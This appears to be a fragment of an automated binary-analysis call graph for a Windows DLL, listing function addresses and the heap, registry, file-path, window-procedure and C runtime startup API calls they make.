calls 76966->76967 76968 6c914099 76967->76968 76969 6c968f0e ctype RtlFreeHeap 76968->76969 76970 6c9140a8 76969->76970 76971 6c94833e ctype 110 API calls 76970->76971 76972 6c9140b6 76971->76972 76973 6c949067 ctype 71 API calls 76972->76973 76974 6c9140c2 76973->76974 76975 6c968f0e ctype RtlFreeHeap 76974->76975 76976 6c9140d1 76975->76976 76977 6c94833e ctype 110 API calls 76976->76977 76978 6c9140df 76977->76978 76979 6c949067 ctype 71 API calls 76978->76979 76980 6c9140eb 76979->76980 76981 6c968f0e ctype RtlFreeHeap 76980->76981 76982 6c9140fa 76981->76982 76983 6c94833e ctype 110 API calls 76982->76983 76984 6c914108 76983->76984 76985 6c949067 ctype 71 API calls 76984->76985 76986 6c914114 76985->76986 76987 6c968f0e ctype RtlFreeHeap 76986->76987 76988 6c914123 76987->76988 76989 6c94833e ctype 110 API calls 76988->76989 76990 6c914131 76989->76990 76991 6c949067 ctype 71 API calls 76990->76991 76992 6c91413d 76991->76992 76993 6c968f0e ctype RtlFreeHeap 76992->76993 76994 6c91414c 76993->76994 76995 6c94833e ctype 110 API calls 76994->76995 76996 6c91415a 76995->76996 76997 6c949067 ctype 71 API calls 76996->76997 76998 6c914166 76997->76998 76999 6c968f0e ctype RtlFreeHeap 76998->76999 77000 6c914175 76999->77000 77001 6c94833e ctype 110 API calls 77000->77001 77002 6c914183 77001->77002 77003 6c949067 ctype 71 API calls 77002->77003 77004 6c91418f 77003->77004 77005 6c968f0e ctype RtlFreeHeap 77004->77005 77005->76898 77007 6c913e77 ctype 114 API calls 77006->77007 77008 6c9592d0 77007->77008 77398 6c914486 77008->77398 77011 6c968f0e ctype RtlFreeHeap 77012 6c9592f4 77011->77012 77018 6c9592f8 77012->77018 77401 6c91423c 111 API calls ctype 77012->77401 77014 6c959320 77016 6c913a16 ctype 111 API calls 77014->77016 77014->77018 77015 6c9141a9 ctype 67 API calls 77017 6c947793 77015->77017 77016->77018 77019 6c91420c 77017->77019 77018->77015 77020 6c9141d6 111 API calls 77019->77020 77021 6c914216 77020->77021 77022 6c91422a 77021->77022 77023 6c913a16 ctype 111 API calls 77021->77023 77024 6c913a16 77022->77024 77023->77022 77025 6c913a22 __EH_prolog3 77024->77025 77026 6c94833e ctype 110 API calls 77025->77026 77027 6c913a36 77026->77027 77482 6c9488d1 77027->77482 77030 6c968eab std::bad_exception::bad_exception 67 API calls 77031 6c913a50 77030->77031 77032 6c9488d1 ctype 102 API calls 77031->77032 77033 6c913a62 77032->77033 77489 6c948cd5 77033->77489 77035 6c913a73 77495 6c948c7a 77035->77495 77037 6c913a8f ctype 77038 6c948cd5 ctype 101 API calls 77037->77038 77044 6c913ad6 ctype 77037->77044 77039 6c913abc 77038->77039 77040 6c948c7a ctype 101 API calls 77039->77040 77040->77044 77041 6c913b0c 77043 6c913b1f 77041->77043 77045 6c968f0e ctype RtlFreeHeap 77041->77045 77042 6c968f0e ctype RtlFreeHeap 77042->77041 77046 6c913b32 77043->77046 77047 6c968f0e ctype RtlFreeHeap 77043->77047 77044->77041 77044->77042 77045->77043 77048 6c913b4c 77046->77048 77049 6c968f0e ctype RtlFreeHeap 77046->77049 77047->77046 77050 6c913b52 77048->77050 77051 6c948cd5 ctype 101 API calls 77048->77051 77049->77048 77055 6c968f0e ctype RtlFreeHeap 77050->77055 77052 6c913b6b 77051->77052 77501 6c948a98 77052->77501 77057 6c913c74 77055->77057 77059 6c968f0e ctype RtlFreeHeap 77057->77059 77061 6c913c7f ctype 77059->77061 77060 6c913bf2 77064 6c913c13 77060->77064 77066 6c968f0e ctype RtlFreeHeap 77060->77066 77061->76853 77062 6c948cd5 ctype 101 API calls 77063 6c913bb6 77062->77063 77065 6c948a98 ctype 67 API calls 77063->77065 77067 6c913c26 77064->77067 77068 6c968f0e ctype RtlFreeHeap 77064->77068 77070 6c913bda 77065->77070 77066->77064 77069 6c913c39 77067->77069 77071 6c968f0e ctype RtlFreeHeap 77067->77071 77068->77067 77069->77050 77073 6c968f0e ctype RtlFreeHeap 77069->77073 77072 6c9485bc ctype KiUserExceptionDispatcher 77070->77072 77071->77069 77072->77060 77073->77050 77075 6c913a16 ctype 111 API calls 77074->77075 77076 6c9141e9 77075->77076 77077 6c9141fa 77076->77077 77078 6c913a16 ctype 111 API calls 77076->77078 77079 6c9141a9 77077->77079 77078->77077 77584 6c95657a 77079->77584 77082->76868 77083->76871 77084->76873 77086 6c9714d3 77085->77086 77087 6c9714df KiUserExceptionDispatcher 77085->77087 77086->77087 77087->76877 77089 6c968e58 77088->77089 77091 6c917cad 77088->77091 77116 6c968e8c 77089->77116 77091->76882 77093 6c917cf4 __EH_prolog3 77092->77093 77119 6c94833e 77093->77119 77095 6c917d16 77127 6c917ee4 77095->77127 77097 6c917d25 77135 6c968f0e 77097->77135 77101 6c917d3d ctype 77102 6c968f0e ctype RtlFreeHeap 77101->77102 77103 6c917d5c 77102->77103 77104 6c915dd0 113 API calls 77103->77104 77105 6c917d65 ctype 77104->77105 77106 6c968f0e ctype RtlFreeHeap 77105->77106 77107 6c917d8a ctype 77106->77107 77153 6c915485 77107->77153 77109 6c917daf ctype 77110 6c968f0e ctype RtlFreeHeap 77109->77110 77111 6c917dd4 77110->77111 77163 6c91575e 77111->77163 77113 6c917ddd ctype 77114 6c968f0e ctype RtlFreeHeap 77113->77114 77115 6c917e02 ctype 77114->77115 77115->76885 77117 6c9714aa __CxxThrowException@8 KiUserExceptionDispatcher 77116->77117 77118 6c968ea5 77117->77118 77120 6c94834a __EH_prolog3 77119->77120 77121 6c968e54 ctype KiUserExceptionDispatcher 77120->77121 77122 6c948357 77121->77122 77168 6c94fe8a 77122->77168 77126 6c948371 ctype 77126->77095 77128 6c917ef0 __EH_prolog3 77127->77128 77129 6c968eab std::bad_exception::bad_exception 67 API calls 77128->77129 77130 6c917f06 77129->77130 77239 6c9484b9 77130->77239 77133 6c968f0e ctype RtlFreeHeap 77134 6c917f26 ctype 77133->77134 77134->77097 77136 6c917d34 77135->77136 77137 6c968f1d 77135->77137 77139 6c915dd0 77136->77139 77248 6c9754f2 77137->77248 77140 6c915ddc __EH_prolog3 77139->77140 77251 6c915c6f 77140->77251 77142 6c915df0 77143 6c968eab std::bad_exception::bad_exception 67 API calls 77142->77143 77144 6c915e01 77143->77144 77261 6c915e41 77144->77261 77146 6c915e13 77147 6c9484b9 ctype 101 API calls 77146->77147 77148 6c915e1c 77147->77148 77149 6c968f0e ctype RtlFreeHeap 77148->77149 77150 6c915e27 77149->77150 77151 6c968f0e ctype RtlFreeHeap 77150->77151 77152 6c915e32 ctype 77151->77152 77152->77101 77296 6c976e1a 77153->77296 77155 6c915491 GetModuleHandleW 77156 6c9154b3 GetProcAddress 77155->77156 77157 6c9154a6 77155->77157 77158 6c9154c5 77156->77158 77159 6c9154cb GetNativeSystemInfo 77156->77159 77160 6c94833e ctype 110 API calls 77157->77160 77158->77159 77297 6c914ea3 77159->77297 77162 6c9154b1 ctype 77160->77162 77162->77109 77308 6c915727 GetModuleHandleW 77163->77308 77167 6c91578e 77167->77113 77169 6c94fe96 77168->77169 77170 6c948364 77168->77170 77169->77170 77176 6c948b33 110 API calls ctype 77169->77176 77170->77126 77172 6c968c76 77170->77172 77173 6c968c84 ctype 77172->77173 77177 6c968bdc 77173->77177 77176->77170 77178 6c968bf0 77177->77178 77179 6c968be9 77177->77179 77181 6c968c02 77178->77181 77182 6c968e8c ctype KiUserExceptionDispatcher 77178->77182 77198 6c968b95 KiUserExceptionDispatcher RtlFreeHeap ctype 77179->77198 77192 6c968d91 77181->77192 77182->77181 77185 6c968c31 77188 6c96b1f3 _memcpy_s 66 API calls 77185->77188 77186 6c968c1d 77199 6c96b6ef 66 API calls 2 library calls 77186->77199 77189 6c968c2f 77188->77189 77200 6c968dcd 77189->77200 77191 6c968bee 77191->77126 77193 6c968da6 77192->77193 77194 6c968d9c 77192->77194 77196 6c968c14 77193->77196 77214 6c968d3a 77193->77214 77195 6c968e8c ctype KiUserExceptionDispatcher 77194->77195 77195->77193 77196->77185 77196->77186 77198->77191 77199->77189 77201 6c968dd1 77200->77201 77202 6c968dd8 77201->77202 77203 6c968e8c ctype KiUserExceptionDispatcher 77201->77203 77202->77191 77204 6c968dee 77203->77204 77206 6c968e8c ctype KiUserExceptionDispatcher 77204->77206 77207 6c968e27 77204->77207 77237 6c96b4c9 66 API calls _vwprintf 77204->77237 77206->77204 77208 6c968d91 ctype 70 API calls 77207->77208 77209 6c968e2d 77208->77209 77238 6c96b446 97 API calls swprintf 77209->77238 77211 6c968e3d 77212 6c968dcd ctype 101 API calls 77211->77212 77213 6c968e49 77212->77213 77213->77191 77215 6c968d4b 77214->77215 77216 6c968d53 77215->77216 77219 6c968d5c 77215->77219 77221 6c968c9e 77216->77221 77218 6c968d5a 77218->77196 77219->77218 77231 6c968d0b 77219->77231 77222 6c968cba 77221->77222 77230 6c97563e RtlAllocateHeap 77222->77230 77223 6c968cc5 77224 6c968cd0 77223->77224 77225 6c9677cf std::bad_exception::bad_exception KiUserExceptionDispatcher 77223->77225 77226 6c96b1f3 _memcpy_s 66 API calls 77224->77226 77225->77224 77227 6c968ce9 77226->77227 77228 6c968f0e ctype RtlFreeHeap 77227->77228 77229 6c968cfa 77228->77229 77229->77218 77230->77223 77232 6c968d17 77231->77232 77233 6c968d25 77231->77233 77232->77233 77236 6c9756a7 RtlReAllocateHeap 77232->77236 77234 6c9677cf std::bad_exception::bad_exception KiUserExceptionDispatcher 77233->77234 77235 6c968d2f 77233->77235 77234->77235 77235->77218 77236->77233 77237->77204 77238->77211 77240 6c9484c8 77239->77240 77247 6c917f1e 77239->77247 77241 6c9484ea 77240->77241 77243 6c9484d5 77240->77243 77242 6c968bdc ctype 101 API calls 77241->77242 77242->77247 77244 6c968eab std::bad_exception::bad_exception 67 API calls 77243->77244 77245 6c9484da 77244->77245 77246 6c968f0e ctype RtlFreeHeap 77245->77246 77246->77247 77247->77133 77249 6c9754fd RtlFreeHeap 77248->77249 77250 6c97550b 77248->77250 77249->77250 77250->77136 77253 6c915c7b __EH_prolog3 77251->77253 77252 6c915cb4 77255 6c915cc6 GetModuleFileNameW 77252->77255 77256 6c968e8c ctype KiUserExceptionDispatcher 77252->77256 77253->77252 77254 6c968d3a ctype 70 API calls 77253->77254 77254->77252 77257 6c94833e ctype 110 API calls 77255->77257 77256->77255 77258 6c915ce8 77257->77258 77259 6c968f0e ctype RtlFreeHeap 77258->77259 77260 6c915cf0 ctype 77259->77260 77260->77142 77262 6c915e4d __EH_prolog3 77261->77262 77263 6c94833e ctype 110 API calls 77262->77263 77264 6c915e66 77263->77264 77265 6c968eab std::bad_exception::bad_exception 67 API calls 77264->77265 77266 6c915e77 PathFindFileNameW 77265->77266 77267 6c915e8e PathFindExtensionW 77266->77267 77269 6c915eab 77267->77269 77282 6c9489f0 77269->77282 77274 6c9484b9 ctype 101 API calls 77275 6c915ee2 77274->77275 77276 6c968f0e ctype RtlFreeHeap 77275->77276 77277 6c915eed 77276->77277 77278 6c968f0e ctype RtlFreeHeap 77277->77278 77279 6c915ef8 77278->77279 77280 6c968f0e ctype RtlFreeHeap 77279->77280 77281 6c915f03 ctype 77280->77281 77281->77146 77283 6c948a15 ctype 67 API calls 77282->77283 77284 6c915ec4 77283->77284 77285 6c948a15 77284->77285 77286 6c948a2a 77285->77286 77287 6c948a6d 77286->77287 77290 6c948a3d 77286->77290 77288 6c968e8c ctype KiUserExceptionDispatcher 77287->77288 77289 6c948a77 ctype 77288->77289 77295 6c94feb7 67 API calls 3 library calls 77289->77295 77290->77289 77291 6c948a5b 77290->77291 77292 6c968eab std::bad_exception::bad_exception 67 API calls 77291->77292 77294 6c915ed9 77292->77294 77294->77274 77295->77294 77296->77155 77302 6c914fd5 77297->77302 77300 6c94833e ctype 110 API calls 77301 6c914f56 77300->77301 77301->77162 77303 6c914ffd 77302->77303 77306 6c915085 GetSystemMetrics 77303->77306 77307 6c915001 77303->77307 77304 6c96b091 ___strgtold12_l 5 API calls 77305 6c914eb2 77304->77305 77305->77300 77306->77307 77307->77304 77309 6c915755 77308->77309 77310 6c91573b GetProcAddress 77308->77310 77313 6c915847 110 API calls 2 library calls 77309->77313 77311 6c91574b 77310->77311 77312 6c91574e GetSystemInfo 77310->77312 77311->77312 77312->77309 77313->77167 77315 6c917887 __EH_prolog3 77314->77315 77316 6c91789e RegOpenKeyExW 77315->77316 77320 6c917938 ctype 77315->77320 77317 6c9178c2 RegQueryValueExW RegCloseKey 77316->77317 77318 6c917908 SHGetFolderPathW 77316->77318 77317->77318 77321 6c9178ef GetFileAttributesW 77317->77321 77319 6c91791d 77318->77319 77325 6c91793e 77318->77325 77337 6c96b8ad 77319->77337 77320->76893 77321->77318 77323 6c917900 77321->77323 77323->77320 77346 6c915d3f 77325->77346 77326 6c917930 GetFileAttributesW 77326->77320 77326->77325 77328 6c91795e 77359 6c948e8b 77328->77359 77331 6c968f0e ctype RtlFreeHeap 77332 6c91797c 77331->77332 77365 6c96b927 77332->77365 77335 6c917991 77336 6c968f0e ctype RtlFreeHeap 77335->77336 77336->77320 77338 6c96b8c2 77337->77338 77340 6c96b8bb 77337->77340 77374 6c96bd29 66 API calls __getptd_noexit 77338->77374 77340->77338 77343 6c96b8f7 77340->77343 77342 6c917929 77342->77325 77342->77326 77343->77342 77376 6c96bd29 66 API calls __getptd_noexit 77343->77376 77345 6c96b8c7 77375 6c96ecf4 11 API calls __cftof2_l 77345->77375 77348 6c915d4b __EH_prolog3 77346->77348 77347 6c915d8c GetModuleFileNameW 77377 6c968afc 77347->77377 77348->77347 77349 6c968d3a ctype 70 API calls 77348->77349 77351 6c915d89 77349->77351 77351->77347 77353 6c94833e ctype 110 API calls 77354 6c915dad 77353->77354 77382 6c948f73 77354->77382 77357 6c968f0e ctype RtlFreeHeap 77358 6c915dc0 ctype 77357->77358 77358->77328 77360 6c948eb0 PathCombineW 77359->77360 77361 6c948ea9 77359->77361 77363 6c968afc ctype KiUserExceptionDispatcher 77360->77363 77362 6c968d3a ctype 70 API calls 77361->77362 77362->77360 77364 6c917971 77363->77364 77364->77331 77366 6c96b935 77365->77366 77367 6c96b93c 77365->77367 77366->77367 77369 6c96b95d 77366->77369 77387 6c96bd29 66 API calls __getptd_noexit 77367->77387 77371 6c917986 GetFileAttributesW 77369->77371 77389 6c96bd29 66 API calls __getptd_noexit 77369->77389 77371->77335 77373 6c96b941 77388 6c96ecf4 11 API calls __cftof2_l 77373->77388 77374->77345 77375->77342 77376->77345 77378 6c968b01 _wcsnlen 77377->77378 77379 6c915da4 77378->77379 77380 6c968e8c ctype KiUserExceptionDispatcher 77378->77380 77379->77353 77381 6c968b34 77380->77381 77383 6c968d91 ctype 70 API calls 77382->77383 77384 6c948f83 PathRemoveFileSpecW 77383->77384 77385 6c968afc ctype KiUserExceptionDispatcher 77384->77385 77386 6c915db8 77385->77386 77386->77357 77387->77373 77388->77371 77389->77373 77393 6c949073 __EH_prolog3 77390->77393 77391 6c949094 77395 6c9490db ctype 77391->77395 77396 6c96be92 __recalloc 70 API calls 77391->77396 77392 6c968eab std::bad_exception::bad_exception 67 API calls 77392->77395 77393->77391 77394 6c968e8c ctype KiUserExceptionDispatcher 77393->77394 77397 6c9490b5 77393->77397 77394->77391 77395->76902 77396->77397 77397->77392 77397->77395 77402 6c913c8f 77398->77402 77400 6c9144a0 77400->77011 77401->77014 77403 6c913c9b __EH_prolog3 77402->77403 77404 6c94833e ctype 110 API calls 77403->77404 77405 6c913cb7 77404->77405 77406 6c968e54 ctype KiUserExceptionDispatcher 77405->77406 77407 6c913cca 77406->77407 77408 6c913a16 ctype 111 API calls 77407->77408 77409 6c913cdd 77408->77409 77410 6c9489f0 ctype 67 API calls 77409->77410 77444 6c913ded 77409->77444 77412 6c913cfe 77410->77412 77411 6c968f0e ctype RtlFreeHeap 77413 6c913e36 ctype 77411->77413 77414 6c9484b9 ctype 101 API calls 77412->77414 77413->77400 77415 6c913d07 77414->77415 77416 6c968f0e ctype RtlFreeHeap 77415->77416 77417 6c913d16 77416->77417 77445 6c948989 77417->77445 77421 6c913d29 ctype 77422 6c968f0e ctype RtlFreeHeap 77421->77422 77423 6c913d48 77422->77423 77424 6c913d50 77423->77424 77429 6c913def _wcspbrk 77423->77429 77425 6c9489f0 ctype 67 API calls 77424->77425 77426 6c913d5e 77425->77426 77427 6c9484b9 ctype 101 API calls 77426->77427 77428 6c913d67 77427->77428 77430 6c968f0e ctype RtlFreeHeap 77428->77430 77431 6c948aed ctype 67 API calls 77429->77431 77429->77444 77436 6c913d76 ctype 77430->77436 77432 6c913e17 77431->77432 77433 6c9484b9 ctype 101 API calls 77432->77433 77434 6c913e20 77433->77434 77435 6c968f0e ctype RtlFreeHeap 77434->77435 77435->77444 77437 6c948aed ctype 67 API calls 77436->77437 77436->77444 77438 6c913dc5 77437->77438 77439 6c9484b9 ctype 101 API calls 77438->77439 77440 6c913dce 77439->77440 77441 6c968f0e ctype RtlFreeHeap 77440->77441 77442 6c913ddd 77441->77442 77463 6c948636 101 API calls 2 library calls 77442->77463 77444->77411 77464 6c948931 77445->77464 77448 6c948992 77449 6c9489a9 77448->77449 77472 6c96c49f 77448->77472 77450 6c913d1d 77449->77450 77451 6c968d91 ctype 70 API calls 77449->77451 77456 6c948aed 77450->77456 77452 6c9489bc 77451->77452 77475 6c967942 67 API calls 2 library calls 77452->77475 77454 6c9489d9 77455 6c968dcd ctype 101 API calls 77454->77455 77455->77450 77457 6c948b02 77456->77457 77458 6c948b1a ctype 77457->77458 77459 6c948b0b 77457->77459 77481 6c94feb7 67 API calls 3 library calls 77458->77481 77460 6c968eab std::bad_exception::bad_exception 67 API calls 77459->77460 77461 6c948b13 77460->77461 77461->77421 77463->77444 77465 6c948944 77464->77465 77466 6c94897e 77464->77466 77467 6c96c49f ctype GetStringTypeW 77465->77467 77468 6c948967 77465->77468 77466->77448 77467->77465 77468->77466 77469 6c968d91 ctype 70 API calls 77468->77469 77470 6c948975 77469->77470 77471 6c968dcd ctype 101 API calls 77470->77471 77471->77466 77476 6c97094f 77472->77476 77474 6c96c4ae 77474->77448 77475->77454 77477 6c970964 77476->77477 77478 6c970960 77476->77478 77479 6c97097f GetStringTypeW 77477->77479 77480 6c97096f 77477->77480 77478->77474 77479->77480 77480->77474 77481->77461 77483 6c968d91 ctype 70 API calls 77482->77483 77484 6c9488e2 77483->77484 77512 6c96cb99 77484->77512 77487 6c968dcd ctype 101 API calls 77488 6c913a42 77487->77488 77488->77030 77490 6c948ce1 __EH_prolog3 ctype 77489->77490 77491 6c968e54 ctype KiUserExceptionDispatcher 77490->77491 77492 6c948cfa ctype 77491->77492 77574 6c94ffa8 77492->77574 77494 6c948d21 ctype 77494->77035 77496 6c948c86 __EH_prolog3 ctype 77495->77496 77497 6c968e54 ctype KiUserExceptionDispatcher 77496->77497 77498 6c948c9f ctype 77497->77498 77499 6c94ffa8 ctype 101 API calls 77498->77499 77500 6c948cc2 ctype 77499->77500 77500->77037 77502 6c948aab 77501->77502 77503 6c948ab6 77502->77503 77504 6c948ac8 ctype 77502->77504 77505 6c968eab std::bad_exception::bad_exception 67 API calls 77503->77505 77583 6c94feb7 67 API calls 3 library calls 77504->77583 77506 6c913b8c 77505->77506 77508 6c9485bc 77506->77508 77509 6c9485c5 77508->77509 77511 6c913ba1 77508->77511 77510 6c968e8c ctype KiUserExceptionDispatcher 77509->77510 77510->77511 77511->77060 77511->77062 77515 6c96cb61 77512->77515 77520 6c96c12f 77515->77520 77521 6c96c142 77520->77521 77527 6c96c18f 77520->77527 77561 6c96d3d1 66 API calls 2 library calls 77521->77561 77523 6c96c147 77524 6c96c16f 77523->77524 77562 6c971edb 74 API calls 6 library calls 77523->77562 77524->77527 77563 6c97172d 68 API calls 6 library calls 77524->77563 77528 6c96c9ec 77527->77528 77529 6c96ca1c _wcsnlen 77528->77529 77530 6c96ca08 77528->77530 77529->77530 77533 6c96ca33 77529->77533 77564 6c96bd29 66 API calls __getptd_noexit 77530->77564 77532 6c96ca0d 77565 6c96ecf4 11 API calls __cftof2_l 77532->77565 77538 6c96ca17 77533->77538 77566 6c972016 LCMapStringW _wcsnlen 77533->77566 77536 6c96ca79 77539 6c96ca85 77536->77539 77540 6c96ca9c 77536->77540 77537 6c96b091 ___strgtold12_l 5 API calls 77543 6c9488ec 77537->77543 77538->77537 77567 6c96bd29 66 API calls __getptd_noexit 77539->77567 77542 6c96caa1 77540->77542 77552 6c96cab2 77540->77552 77569 6c96bd29 66 API calls __getptd_noexit 77542->77569 77543->77487 77544 6c96ca8a 77568 6c96bd29 66 API calls __getptd_noexit 77544->77568 77546 6c96cacd __crtLCMapStringA_stat 77547 6c96cafd 77546->77547 77548 6c96cb0a 77546->77548 77570 6c96bd29 66 API calls __getptd_noexit 77547->77570 77571 6c972016 LCMapStringW _wcsnlen 77548->77571 77552->77546 77553 6c96bfb3 _malloc 66 API calls 77552->77553 77553->77546 77554 6c96cb1d 77555 6c96cb24 77554->77555 77556 6c96cb35 77554->77556 77558 6c96b927 __NMSG_WRITE 66 API calls 77555->77558 77572 6c96bd29 66 API calls __getptd_noexit 77556->77572 77559 6c96cb2e 77558->77559 77573 6c96c244 66 API calls _free 77559->77573 77561->77523 77562->77524 77563->77527 77564->77532 77565->77538 77566->77536 77567->77544 77568->77538 77569->77532 77570->77544 77571->77554 77572->77559 77573->77538 77575 6c968d91 ctype 70 API calls 77574->77575 77576 6c94ffc2 77575->77576 77577 6c96b1f3 _memcpy_s 66 API calls 77576->77577 77578 6c94ffd3 77577->77578 77579 6c96b1f3 _memcpy_s 66 API calls 77578->77579 77580 6c94ffe3 77579->77580 77581 6c968dcd ctype 101 API calls 77580->77581 77582 6c94fff1 77581->77582 77582->77494 77583->77506 77585 6c956583 77584->77585 77586 6c9141bd 77584->77586 77587 6c9565a0 77585->77587 77588 6c968f0e ctype RtlFreeHeap 77585->77588 77589 6c96be0e _free 66 API calls 77587->77589 77588->77585 77589->77586 85422 6c4a5f10 85423 6c4a5f1a CallWindowProcW 85422->85423 85424 6c4a5f32 GetWindowLongW CallWindowProcW 85422->85424 85425 6c4a5f7f 85423->85425 85424->85425 85426 6c4a5f64 GetWindowLongW 85424->85426 85426->85425 85427 6c4a5f71 SetWindowLongW 85426->85427 85427->85425 85428 6c623fbf 85431 6c623ee2 85428->85431 85436 6c623e29 85431->85436 85434 6c623e29 5 API calls 85435 6c623f14 85434->85435 85437 6c623e4d 85436->85437 85439 6c62f65c 85436->85439 85437->85439 85441 6c623e73 RegOpenKeyExW 85437->85441 85438 6c62f6e6 85439->85438 85449 6c635f11 EtwTraceMessage 85439->85449 85442 6c623ea0 RegQueryValueExW 85441->85442 85443 6c623ec6 85441->85443 85442->85443 85446 6c623ebc 85442->85446 85444 6c623ed4 85443->85444 85445 6c623ecb RegCloseKey 85443->85445 85444->85434 85444->85435 85445->85444 85446->85443 85448 6c6377b8 EtwTraceMessage 85446->85448 85448->85443 85449->85438 85450 6c96b059 85451 6c96b064 85450->85451 85452 6c96b069 85450->85452 85464 6c96e588 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 85451->85464 85456 6c96af5e 85452->85456 85455 6c96b077 85457 6c96af6a _flsall 85456->85457 85461 6c96b007 _flsall 85457->85461 85462 6c96afb7 ___DllMainCRTStartup 85457->85462 85465 6c96adf5 85457->85465 85459 6c96afe7 85460 6c96adf5 __CRT_INIT@12 149 API calls 85459->85460 85459->85461 85460->85461 85461->85455 85462->85459 85462->85461 85463 6c96adf5 __CRT_INIT@12 149 API calls 85462->85463 85463->85459 85464->85452 85466 6c96ae01 _flsall 85465->85466 85467 6c96ae83 85466->85467 85468 6c96ae09 85466->85468 85469 6c96aee4 85467->85469 85470 6c96ae89 85467->85470 85517 6c96e1d6 HeapCreate 85468->85517 85473 6c96af42 85469->85473 85474 6c96aee9 85469->85474 85476 6c96aea7 85470->85476 85482 6c96ae12 _flsall 85470->85482 85590 6c96dacb 66 API calls _doexit 85470->85590 85472 6c96ae0e 85472->85482 85518 6c96d597 GetModuleHandleW 85472->85518 85473->85482 85603 6c96d524 79 API calls __freefls@4 85473->85603 85595 6c96d21f TlsGetValue _DecodePointerInternal TlsSetValue 85474->85595 85480 6c96aebb 85476->85480 85591 6c96dd4c 67 API calls _free 85476->85591 85477 6c96aeee 85596 6c96d761 85477->85596 85594 6c96aece 70 API calls __mtterm 85480->85594 85482->85462 85484 6c96ae1e __RTC_Initialize 85488 6c96ae22 85484->85488 85494 6c96ae2e GetCommandLineA 85484->85494 85585 6c96e1f9 HeapDestroy 85488->85585 85489 6c96aeb1 85592 6c96d258 70 API calls _free 85489->85592 85490 6c96af06 _DecodePointerInternal 85495 6c96af1b 85490->85495 85493 6c96aeb6 85593 6c96e1f9 HeapDestroy 85493->85593 85543 6c96e0e4 GetEnvironmentStringsW 85494->85543 85498 6c96af36 85495->85498 85499 6c96af1f 85495->85499 85502 6c96be0e _free 66 API calls 85498->85502 85602 6c96d29a 66 API calls 4 library calls 85499->85602 85502->85482 85504 6c96af26 GetCurrentThreadId 85504->85482 85506 6c96ae4c 85586 6c96d258 70 API calls _free 85506->85586 85509 6c96ae58 85510 6c96ae6c 85509->85510 85569 6c96dda4 85509->85569 85516 6c96ae71 85510->85516 85589 6c96dd4c 67 API calls _free 85510->85589 85514 6c96ae81 85514->85506 85516->85482 85517->85472 85519 6c96d5b4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85518->85519 85520 6c96d5ab 85518->85520 85522 6c96d5fe TlsAlloc 85519->85522 85604 6c96d258 70 API calls _free 85520->85604 85525 6c96d64c TlsSetValue 85522->85525 85526 6c96d70d 85522->85526 85523 6c96d5b0 85523->85484 85525->85526 85527 6c96d65d 85525->85527 85526->85484 85605 6c96d86e _EncodePointerInternal _EncodePointerInternal __init_pointers __initp_misc_winsig FindHandlerForForeignException 85527->85605 85529 6c96d662 _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal 85606 6c9724bd InitializeCriticalSectionAndSpinCount 85529->85606 85531 6c96d6a1 85532 6c96d6a5 _DecodePointerInternal 85531->85532 85533 6c96d708 85531->85533 85535 6c96d6ba 85532->85535 85608 6c96d258 70 API calls _free 85533->85608 85535->85533 85536 6c96d761 __calloc_crt 66 API calls 85535->85536 85537 6c96d6d0 85536->85537 85537->85533 85538 6c96d6d8 _DecodePointerInternal 85537->85538 85539 6c96d6e9 85538->85539 85539->85533 85540 6c96d6ed 85539->85540 85607 6c96d29a 66 API calls 4 library calls 85540->85607 85542 6c96d6f5 GetCurrentThreadId 85542->85526 85544 6c96e100 WideCharToMultiByte 85543->85544 85545 6c96ae3e 85543->85545 85547 6c96e135 85544->85547 85548 6c96e16d FreeEnvironmentStringsW 85544->85548 85556 6c96db02 GetStartupInfoW 85545->85556 85609 6c96d717 66 API calls _malloc 85547->85609 85548->85545 85550 6c96e13b 85550->85548 85551 6c96e143 WideCharToMultiByte 85550->85551 85552 6c96e155 85551->85552 85553 6c96e161 FreeEnvironmentStringsW 85551->85553 85554 6c96be0e _free 66 API calls 85552->85554 85553->85545 85555 6c96e15d 85554->85555 85555->85553 85557 6c96d761 __calloc_crt 66 API calls 85556->85557 85558 6c96db20 85557->85558 85558->85558 85559 6c96dc95 85558->85559 85561 6c96d761 __calloc_crt 66 API calls 85558->85561 85563 6c96ae48 85558->85563 85565 6c96dc15 85558->85565 85560 6c96dccb GetStdHandle 85559->85560 85562 6c96dd2f SetHandleCount 85559->85562 85564 6c96dcdd GetFileType 85559->85564 85568 6c96dd03 InitializeCriticalSectionAndSpinCount 85559->85568 85560->85559 85561->85558 85562->85563 85563->85506 85587 6c96e024 95 API calls 3 library calls 85563->85587 85564->85559 85565->85559 85566 6c96dc41 GetFileType 85565->85566 85567 6c96dc4c InitializeCriticalSectionAndSpinCount 85565->85567 85566->85565 85566->85567 85567->85563 85567->85565 85568->85559 85568->85563 85570 6c96ddad 85569->85570 85573 6c96ddb2 _strlen 85569->85573 85610 6c971be4 94 API calls __setmbcp 85570->85610 85572 6c96ae61 85572->85510 85588 6c96d8cf 77 API calls 4 library calls 85572->85588 85573->85572 85574 6c96d761 __calloc_crt 66 API calls 85573->85574 85579 6c96dde7 _strlen 85574->85579 85575 6c96de36 85576 6c96be0e _free 66 API calls 85575->85576 85576->85572 85577 6c96d761 __calloc_crt 66 API calls 85577->85579 85578 6c96de5c 85581 6c96be0e _free 66 API calls 85578->85581 85579->85572 85579->85575 85579->85577 85579->85578 85582 6c96de73 85579->85582 85611 6c972a21 66 API calls __cftof2_l 85579->85611 85581->85572 85612 6c96ec98 10 API calls __call_reportfault 85582->85612 85584 6c96de7f 85585->85482 85586->85488 85587->85509 85588->85510 85589->85514 85590->85476 85591->85489 85592->85493 85593->85480 85594->85482 85595->85477 85597 6c96d76a 85596->85597 85599 6c96aefa 85597->85599 85600 6c96d788 Sleep 85597->85600 85613 6c970eda 85597->85613 85599->85482 85599->85490 85601 6c96d79d 85600->85601 85601->85597 85601->85599 85602->85504 85603->85482 85604->85523 85605->85529 85606->85531 85607->85542 85608->85526 85609->85550 85610->85573 85611->85579 85612->85584 85614 6c970ee6 85613->85614 85615 6c970f01 85613->85615 85614->85615 85616 6c970ef2 85614->85616 85618 6c970f14 RtlAllocateHeap 85615->85618 85620 6c970f3b 85615->85620 85623 6c971247 _DecodePointerInternal 85615->85623 85622 6c96bd29 66 API calls __getptd_noexit 85616->85622 85618->85615 85618->85620 85619 6c970ef7 85619->85597 85620->85597 85622->85619 85623->85615 85624 6c4b2184 85625 6c4b218e 85624->85625 85626 6c4b2197 85624->85626 85638 